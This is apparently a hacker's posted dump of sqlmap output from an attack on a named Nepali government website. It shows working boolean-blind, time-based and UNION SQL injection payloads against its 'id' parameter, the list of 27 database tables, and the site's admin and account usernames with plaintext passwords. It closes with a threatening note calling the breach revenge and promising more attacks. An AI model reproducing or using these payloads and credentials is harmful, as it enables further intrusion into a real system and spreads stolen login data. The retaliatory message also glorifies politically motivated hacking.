URL:- https://www.nnl.gov.np/content.php?id=16
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26' AND 7461=7461 AND 'zfwn'='zfwn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=26' AND (SELECT 3253 FROM (SELECT(SLEEP(5)))illN) AND 'NNFa'='NNFa
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-2044' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71626a6271,0x534a596a616b424e4e4b436b4c5a426175546c6a514569636f6671586c724c4c4e734259424b5254,0x717a7a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: nnlgov_newdb
[27 tables]
+--------------------+
| gallery |
| gallerydetails |
| rightphoto |
| tblbanner |
| tblbhuktani |
| tblcollectiongroup |
| tblcollections |
| tblcontacts |
| tbldownloadgroup |
| tbldownloads |
| tblevents |
| tblfaq |
| tblfaq_cat |
| tblgrantgroup |
| tblgrants |
| tbljingle |
| tbllinks |
| tblmain |
| tblmenu |
| tblnews |
| tblnotice |
| tblrti |
| tblrtigroup |
| tbluploads |
| tblvideo |
| usertable |
| whoiswho |
+--------------------+
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26' AND 7461=7461 AND 'zfwn'='zfwn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=26' AND (SELECT 3253 FROM (SELECT(SLEEP(5)))illN) AND 'NNFa'='NNFa
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-2044' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71626a6271,0x534a596a616b424e4e4b436b4c5a426175546c6a514569636f6671586c724c4c4e734259424b5254,0x717a7a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: nnlgov_newdb
Table: usertable
[2 entries]
+--------+---------+--------------+
| userid | usern | userp |
+--------+---------+--------------+
| 1 | admin | admin |
| 2 | account | account@123# |
+--------+---------+--------------+
NOTE:- Small vengeance for killing an Indian. Expect more for what you've done.
